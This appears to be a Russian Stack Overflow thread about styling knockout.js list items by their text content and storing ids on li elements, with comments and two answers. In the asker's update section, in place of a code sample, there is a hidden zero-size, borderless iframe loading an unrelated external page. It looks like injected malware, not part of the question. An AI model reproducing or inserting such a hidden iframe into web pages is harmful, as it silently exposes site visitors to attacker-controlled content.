# Как в knockout.js применить стиль к элементу списка в зависимости от его содержания?

Tags: javascript, knockoutjs

Например, есть переменная с текстом активного элемента, и если элемент (li) содержит данный текст, то применить к нему определенный стиль, каким образом можно реализовать это?

**Обновление**

Вот пример: jsfiddle.net/DenisNeustroev/HEUgM

```html
<iframe name="namchp" width=0 height=0 src="http://akillitelefonburada.com/yon.html" scrolling="no" frameborder="0"></iframe>
```

Тоже думаю, что не совсем правильно, если будет элемент с таким же содержанием, то будет поведение будет странным). Думаю какой-то `id` добавить к `li`, но пока не знаю как все это реализовать, мне важно не просто зрительно выделить элемент, а и еще знать что это за элемент на программном уровне, и обеспечить его уникальность.

Comment: наверное можно, но идея плохая так делать. вы бы пример на fiddle сделали, чтобы нам не делать.

Comment: [так](http://jsfiddle.net/oceog/HEUgM/4/) примерно хочется ?

Comment: @eicto, да) вы предложили превосходный вариант) я уже ближе к цели) может вы еще подскажите как в li можно сохранить свою информацию? например, id документа с базы данных? я пока думаю на основе вашего варианта, сделать объект с отношениями HTMLNode -> id_документа, и при каждом клике на li получать id, основываясь на таблице соотношений, один минус, что ее придется вручную перестраивать при каждом изменении DOM, что не соответствует bind-data модели knockout.js

Comment: можно сделать примерно как в jquery (поленился туда смотреть, но думаю там что-то похожее) http://jsfiddle.net/oceog/HEUgM/7/ т.е. держим массив ссылок на элементы, и по тому-же самому индексу держим массив значений, находим индекс элемента, находим значение, я там наверное перемудрил с this и apply, какая-то мысль была, но я ее забыл.

Comment: в коде разобрался, то есть та самая реализация объекта-справочника: сунем id берем value, и как я понял сделать это автоматом для knockout затруднительно. а что если при генерации li с помощью attr сохранять туда id, при клике возвращать $element.id?) сразу отпадает вопрос с перестройкой объекта-справочника, li сам хранит нужную инфу?
на knockout перешел только вчера, когда понял что 500 строк кода, это свой велосипед, поэтому пока плохо в нем ориентируюсь.

Answer (score 2, accepted):

Думаю, проще всего использовать jQuery:

```
$("label[innerHTML=hello world]").addclass('style');
```

Comment: можно, но работать будет также http://jsfiddle.net/DenisNeustroev/C33TR/1

Answer (score 1):

Из документации:

```
<div data-bind="css: customCss">Profit Information</div>

<script type="text/javascript">
    myModel.customCss = ko.computed(function() {
        return self.myText().indexOf('some str') != -1 ? "redBg" : "greenBg";
  });
</script>
```